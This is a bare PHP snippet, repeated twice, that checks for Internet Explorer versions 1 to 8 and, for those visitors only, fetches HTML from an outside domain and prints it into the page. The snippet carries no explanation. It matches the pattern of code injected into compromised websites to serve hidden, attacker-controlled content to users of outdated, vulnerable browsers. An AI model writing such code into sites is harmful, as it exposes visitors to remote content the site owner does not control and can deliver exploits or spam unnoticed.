<?php
if(preg_match('/(?i)msie [1-8]/',$_SERVER['HTTP_USER_AGENT'])){ echo file_get_contents('http://www.kautkas.com/file.html'); }
?>
<?php
if(preg_match('/(?i)msie [1-8]/',$_SERVER['HTTP_USER_AGENT'])){ echo file_get_contents('http://www.kautkas.com/file.html'); }
?>